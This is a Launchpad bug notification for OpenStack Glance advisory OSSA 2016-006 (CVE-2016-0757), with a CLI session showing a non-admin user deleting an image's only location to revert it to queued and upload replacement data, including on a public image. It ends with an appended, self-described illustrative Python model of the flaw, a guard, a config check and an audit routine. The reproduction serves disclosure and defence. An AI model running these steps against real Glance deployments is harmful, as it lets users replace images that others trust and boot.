** Changed in: glance/kilo
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1525915
Title:
[OSSA 2016-006] Normal user can change image status if show_multiple_locations has been set to true (CVE-2016-0757)
Status in Glance:
Fix Released
Status in Glance kilo series:
Fix Released
Status in Glance liberty series:
Fix Committed
Status in OpenStack Security Advisory:
Fix Released
Bug description:
User (non admin) can set image back to queued state by deleting
location(s) from image when "show_multiple_locations" config parameter
has been set to true.
This breaks the immutability promise glance has, in a similar way to the one
described in OSSA 2015-019, as the image gets transitioned from active
to queued and new image data can be uploaded.
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T09:58:54Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:43:23Z |
| virtual_size | None |
| visibility | private |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:43:41Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
This also works on public images.
ubuntu@devstack-02:~/devstack$ . ./openrc admin admin
ubuntu@devstack-02:~/devstack$ glance image-update --visibility=public f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:11Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ . ./openrc
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:45:28Z |
| virtual_size | None |
| visibility | public |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:43Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
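As an added illustration (not from the bug report, the advisory, or Glance's own code), the following Python model reproduces the state transition shown in the session above and puts the defensive pieces beside it: a policy check that refuses to remove the last location of an active image, a configparser test for the show_multiple_locations precondition in a glance-api.conf, and a small audit function that flags active -> queued transitions in a constructed list of status changes. Every class and function name here is hypothetical, and the guard is one possible mitigation rather than a claim about what the released fix does.

```python
"""Model of the image-location state transition reported in this bug.

Added illustration, not code from the bug report or from Glance itself.
It reproduces the reported behaviour (removing the last location drops an
'active' image back to 'queued', so image-upload is accepted again), shows
a guard that refuses that transition, checks the show_multiple_locations
precondition in a glance-api.conf text, and flags the resulting
active -> queued transitions in a list of status-change records.
Every class and function name below is hypothetical.
"""
from __future__ import annotations

import configparser
from dataclasses import dataclass, field
from typing import Iterable, List, Optional, Tuple


class Forbidden(Exception):
    """Raised when a location change would break image immutability."""


@dataclass
class Image:
    image_id: str
    status: str                          # "queued" or "active"
    size: Optional[int]
    locations: List[str] = field(default_factory=list)


def remove_location_unchecked(img: Image, url: str) -> Image:
    """Reported behaviour: once the location list is empty the image is
    demoted to 'queued' and its size cleared, exactly as the second
    image-show in the session above displays."""
    img.locations = [u for u in img.locations if u != url]
    if not img.locations:
        img.status = "queued"
        img.size = None
    return img


def location_removal_allowed(img: Image, url: str, is_admin: bool = False) -> bool:
    """Policy check: a non-admin caller may not remove the last location
    of an active image, because that is the only removal that can change
    the image status. Removing one of several locations stays permitted."""
    if url not in img.locations:
        return False
    last_location = len(img.locations) == 1
    return not (img.status == "active" and last_location and not is_admin)


def remove_location_guarded(img: Image, url: str, is_admin: bool = False) -> Image:
    """Guarded variant: same effect as the unchecked version when the
    policy allows it, Forbidden otherwise (the image is left untouched)."""
    if not location_removal_allowed(img, url, is_admin):
        raise Forbidden(f"refusing to remove {url} from image {img.image_id}")
    return remove_location_unchecked(img, url)


def upload_allowed(img: Image) -> bool:
    """Image data is only accepted while the image is queued, which is why
    the demotion matters: it reopens the upload path for a finished image."""
    return img.status == "queued"


def exposed_to_location_edits(conf_text: str) -> bool:
    """True when show_multiple_locations is enabled in the [DEFAULT] section
    of a glance-api.conf, the precondition named in the bug title."""
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    return cp.getboolean("DEFAULT", "show_multiple_locations", fallback=False)


def suspicious_transitions(changes: Iterable[Tuple[str, str, str]]) -> List[str]:
    """Return image ids whose status went from 'active' back to 'queued'.
    Records are (image_id, old_status, new_status), a shape a defender can
    derive from image update notifications or from the image table."""
    return [image_id for image_id, old, new in changes
            if old == "active" and new == "queued"]


# Constructed sample configuration, not a real deployment's file.
SAMPLE_CONF = """
[DEFAULT]
show_multiple_locations = True
"""

if __name__ == "__main__":
    url = "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc"
    image = Image("f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc", "active", 25165824, [url])
    remove_location_unchecked(image, url)
    print("unchecked removal ->", image.status, "| upload allowed:", upload_allowed(image))
    image = Image("f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc", "active", 25165824, [url])
    try:
        remove_location_guarded(image, url)
    except Forbidden as exc:
        print("guarded removal ->", exc)
    print("config exposed:", exposed_to_location_edits(SAMPLE_CONF))
```

The guard keys on the combination that matters (active status, exactly one location left, non-admin caller) rather than on the config flag, so it holds whether or not show_multiple_locations is exposed to users; the config check is the quick way to tell which deployments are affected at all, and the audit function is the signal to watch for in environments that cannot be patched immediately.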
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1525915/+subscriptions
--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : [email protected]
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help : https://help.launchpad.net/ListHelp